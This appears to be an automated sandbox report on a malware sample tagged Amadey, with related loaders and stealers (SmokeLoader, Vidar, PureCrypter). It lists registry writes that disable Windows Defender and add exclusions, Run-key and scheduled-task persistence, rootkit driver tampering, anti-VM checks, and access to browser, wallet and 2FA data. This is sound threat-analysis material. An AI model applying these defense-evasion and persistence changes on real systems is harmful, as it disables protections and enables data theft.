amadey | c8123964a14a24724ce73744c33bfac9446e53ca0675f37c68510284f8c9ee32

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe

PureCrypter
PureCrypter is a .NET malware loader first seen in early 2021.
loader downloader purecrypter
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs

description	pid	Process	procid_target
PID 2080 created 1364	2080	kRthp4WSd36dGiVtyCKouTRt.exe	22
PID 2080 created 1364	2080	kRthp4WSd36dGiVtyCKouTRt.exe	22
PID 2080 created 1364	2080	kRthp4WSd36dGiVtyCKouTRt.exe	22
PID 2080 created 1364	2080	kRthp4WSd36dGiVtyCKouTRt.exe	22
PID 2080 created 1364	2080	kRthp4WSd36dGiVtyCKouTRt.exe	22
PID 2080 created 1364	2080	kRthp4WSd36dGiVtyCKouTRt.exe	22
PID 320 created 1364	320	updater.exe	22
PID 320 created 1364	320	updater.exe	22
PID 320 created 1364	320	updater.exe	22
PID 320 created 1364	320	updater.exe	22
PID 320 created 1364	320	updater.exe	22
PID 320 created 1364	320	updater.exe	22

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Windows security bypass 2 TTPs 48 IoCs

evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KrPQunXfXpAVC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\GpfcWYRxKqUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\wUBDPVxDQVpvNZiy = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oVhJPNkDU = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	schtasks.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\wUBDPVxDQVpvNZiy = "0"	schtasks.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\wUBDPVxDQVpvNZiy = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\wUBDPVxDQVpvNZiy = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\ZtDMcUM8mSB7FYFigOIx89oA.exe = "0"	ZtDMcUM8mSB7FYFigOIx89oA.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DlbZONUGhjVU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\XChmUZBtIzzgBJhVhfR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	ZtDMcUM8mSB7FYFigOIx89oA.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	ZtDMcUM8mSB7FYFigOIx89oA.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	ZtDMcUM8mSB7FYFigOIx89oA.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	ZtDMcUM8mSB7FYFigOIx89oA.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\vdkHIxEPSE0HzSAz2UJDgMhL.exe = "0"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\GpfcWYRxKqUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KrPQunXfXpAVC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\nBRnpywzcTvqknVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	ZtDMcUM8mSB7FYFigOIx89oA.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\DlbZONUGhjVU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oVhJPNkDU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\nBRnpywzcTvqknVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	ZtDMcUM8mSB7FYFigOIx89oA.exe

Modifies boot configuration data using bcdedit 14 IoCs

pid	Process
2756	bcdedit.exe
552	bcdedit.exe
332	bcdedit.exe
1944	bcdedit.exe
1688	bcdedit.exe
1552	bcdedit.exe
992	bcdedit.exe
3064	bcdedit.exe
2732	bcdedit.exe
2256	bcdedit.exe
380	bcdedit.exe
2624	bcdedit.exe
488	bcdedit.exe
2544	bcdedit.exe

Downloads MZ/PE file

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	updater.exe
File created	C:\Windows\system32\drivers\Winmon.sys	csrss.exe
File created	C:\Windows\System32\drivers\etc\hosts	kRthp4WSd36dGiVtyCKouTRt.exe

Modifies Windows Firewall 1 TTPs 2 IoCs

evasion

Windows Service

pid	Process
1628	netsh.exe
2448	netsh.exe

Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command and Scripting Interpreter
T1059
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Drops startup file 10 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oibdJ6nABvLzqiK9OptbPCby.bat	InstallUtil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\q5AXjmW3qXOzrpdCni8fZumW.bat	InstallUtil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iFWouI3Q9AJqsdvbQSGHDD3g.bat	InstallUtil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Z1BztEX51DHzKtMMeyPydStv.bat	InstallUtil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SLVHydo5rSOqiZrPXKskrpYV.bat	InstallUtil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\19NbgONmtOsAW9bncC9e5JYh.bat	InstallUtil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EsxnhiG6Ie0MHz8DP7DXNTtz.bat	InstallUtil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1f08K50aFDomJLCBqQ8HKRDm.bat	InstallUtil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hJnEkjzj5Ydbkkmib4zLq4wo.bat	InstallUtil.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DIV3kRiMqsfF6GCvVzCDb65T.bat	InstallUtil.exe

Executes dropped EXE 35 IoCs

pid	Process
1380	uUeFYzMg2TIaunkDHxsaP1oH.exe
2016	S2oyyP5o6RkKAYlBole3sVtJ.exe
2312	ZtDMcUM8mSB7FYFigOIx89oA.exe
3008	vdkHIxEPSE0HzSAz2UJDgMhL.exe
2080	kRthp4WSd36dGiVtyCKouTRt.exe
2452	S43ND2aHtJ5KT8vGcjscMGOL.exe
1824	rtyMANYqEaQ5m3g0rUIcowCg.exe
1664	IJmiVlFOgSUbo93PGOTzINSi.exe
1656	taskeng.exe
2528	nhdues.exe
616	IJmiVlFOgSUbo93PGOTzINSi.exe
2236	1untilmathematicsproie1.exe
2548	1untilmathematicspro.exe
2908	untilmathematics.exe
1572	G8iuBkKMAryZUTGiwXZGHIym.exe
1200	Install.exe
1068	Install.exe
2648	ZtDMcUM8mSB7FYFigOIx89oA.exe
2240	vdkHIxEPSE0HzSAz2UJDgMhL.exe
2700	nhdues.exe
632	csrss.exe
2636	injector.exe
2228	patch.exe
320	updater.exe
3060	untilmathematics.exe
312	untilmathematiics.exe
2016	dsefix.exe
2456	nhdues.exe
2508	windefender.exe
1716	windefender.exe
3008	f801950a962ddba14caaa44bf084b55c.exe
392	nhdues.exe
2680	nPHESYk.exe
2568	nhdues.exe
2352	nPHESYk.exe

Loads dropped DLL 50 IoCs

pid	Process
2476	InstallUtil.exe
2476	InstallUtil.exe
2476	InstallUtil.exe
2476	InstallUtil.exe
2476	InstallUtil.exe
2476	InstallUtil.exe
2476	InstallUtil.exe
2476	InstallUtil.exe
2476	InstallUtil.exe
2476	InstallUtil.exe
2476	InstallUtil.exe
1824	rtyMANYqEaQ5m3g0rUIcowCg.exe
2476	InstallUtil.exe
2476	InstallUtil.exe
2016	S2oyyP5o6RkKAYlBole3sVtJ.exe
1824	rtyMANYqEaQ5m3g0rUIcowCg.exe
1380	uUeFYzMg2TIaunkDHxsaP1oH.exe
2236	1untilmathematicsproie1.exe
1656	taskeng.exe
1656	taskeng.exe
2476	InstallUtil.exe
1572	G8iuBkKMAryZUTGiwXZGHIym.exe
1572	G8iuBkKMAryZUTGiwXZGHIym.exe
1572	G8iuBkKMAryZUTGiwXZGHIym.exe
1572	G8iuBkKMAryZUTGiwXZGHIym.exe
1200	Install.exe
1200	Install.exe
1200	Install.exe
1200	Install.exe
1068	Install.exe
1068	Install.exe
1068	Install.exe
2648	ZtDMcUM8mSB7FYFigOIx89oA.exe
2648	ZtDMcUM8mSB7FYFigOIx89oA.exe
632	csrss.exe
856	Process not Found
468	Process not Found
2228	patch.exe
2228	patch.exe
2228	patch.exe
2228	patch.exe
2228	patch.exe
2908	untilmathematics.exe
2548	1untilmathematicspro.exe
2228	patch.exe
2228	patch.exe
2228	patch.exe
632	csrss.exe
632	csrss.exe
632	csrss.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0006000000015ec6-246.dat	upx
behavioral1/files/0x0006000000015ec6-245.dat	upx
behavioral1/files/0x0006000000015ec6-243.dat	upx
behavioral1/memory/1824-281-0x0000000001320000-0x000000000186D000-memory.dmp	upx
behavioral1/memory/1824-805-0x0000000001320000-0x000000000186D000-memory.dmp	upx
behavioral1/files/0x0005000000004ed6-1212.dat	upx

Windows security modification 2 TTPs 8 IoCs

evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	ZtDMcUM8mSB7FYFigOIx89oA.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	ZtDMcUM8mSB7FYFigOIx89oA.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	ZtDMcUM8mSB7FYFigOIx89oA.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\ZtDMcUM8mSB7FYFigOIx89oA.exe = "0"	ZtDMcUM8mSB7FYFigOIx89oA.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\vdkHIxEPSE0HzSAz2UJDgMhL.exe = "0"	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	ZtDMcUM8mSB7FYFigOIx89oA.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	ZtDMcUM8mSB7FYFigOIx89oA.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	ZtDMcUM8mSB7FYFigOIx89oA.exe

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	1untilmathematicspro.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	ZtDMcUM8mSB7FYFigOIx89oA.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	vdkHIxEPSE0HzSAz2UJDgMhL.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	uUeFYzMg2TIaunkDHxsaP1oH.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	1untilmathematicsproie1.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Manipulates WinMon driver. 1 IoCs

Roottkits write to WinMon to hide PIDs from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMon	csrss.exe

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 10 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	nPHESYk.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	nPHESYk.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	nPHESYk.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 1576 set thread context of 2476	1576	c8123964a14a24724ce73744c33bfac9446e53ca0675f37c68510284f8c9ee32.exe	29
PID 1664 set thread context of 616	1664	IJmiVlFOgSUbo93PGOTzINSi.exe	41
PID 2908 set thread context of 3060	2908	untilmathematics.exe	127
PID 320 set thread context of 1460	320	updater.exe	154
PID 320 set thread context of 1620	320	updater.exe	155

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	vdkHIxEPSE0HzSAz2UJDgMhL.exe
File opened (read-only)	\??\VBoxMiniRdrDN	ZtDMcUM8mSB7FYFigOIx89oA.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	kRthp4WSd36dGiVtyCKouTRt.exe

Drops file in Windows directory 8 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\bwpFiyeZPJPVdaMxTt.job	schtasks.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\rss	ZtDMcUM8mSB7FYFigOIx89oA.exe
File created	C:\Windows\rss\csrss.exe	ZtDMcUM8mSB7FYFigOIx89oA.exe
File opened for modification	C:\Windows\rss	vdkHIxEPSE0HzSAz2UJDgMhL.exe
File created	C:\Windows\rss\csrss.exe	vdkHIxEPSE0HzSAz2UJDgMhL.exe
File created	C:\Windows\Logs\CBS\CbsPersist_20231020052443.cab	makecab.exe

Launches sc.exe 11 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
640	sc.exe
2552	sc.exe
2956	sc.exe
2468	sc.exe
2524	sc.exe
1944	sc.exe
1716	sc.exe
1568	sc.exe
1552	sc.exe
2100	sc.exe
772	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	IJmiVlFOgSUbo93PGOTzINSi.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	IJmiVlFOgSUbo93PGOTzINSi.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	IJmiVlFOgSUbo93PGOTzINSi.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskeng.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskeng.exe

Creates scheduled task(s) 1 TTPs 16 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
2720	schtasks.exe
2676	schtasks.exe
2792	schtasks.exe
476	schtasks.exe
2456	schtasks.exe
1756	schtasks.exe
1584	schtasks.exe
2532	schtasks.exe
808	schtasks.exe
1328	schtasks.exe
2096	schtasks.exe
1120	schtasks.exe
1572	schtasks.exe
1960	schtasks.exe
1980	schtasks.exe
2464	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1732	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies Internet Explorer settings 1 TTPs 37 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 90036ccf1503da01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{F6F06821-6F08-11EE-A2C0-EEDB236BE57B} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ea3dc2a7c0fe4d49bd6e8f3e7e71513f000000000200000000001066000000010000200000004d7fd9cbc2e5b8baac0e62322c136e1701ae4907bd6f49e84cf67cae5689c585000000000e80000000020000200000008917c7c2dba401e47879c00c72248ac2a2191e8f89bc3554d180c295586f637f20000000887184c7d9654811794ec5f2150c50eeefe5c270561f47a802e12d7f4a53ecd54000000042cce629e0b7fd56bf238c9fea35b69d5a415b0acb481ac6bd8142d883962fe509347c5afffe28694d662f886092d6e3baf5f05fa006033abffa804385a5e8f0	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-686452656-3203474025-4140627569-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
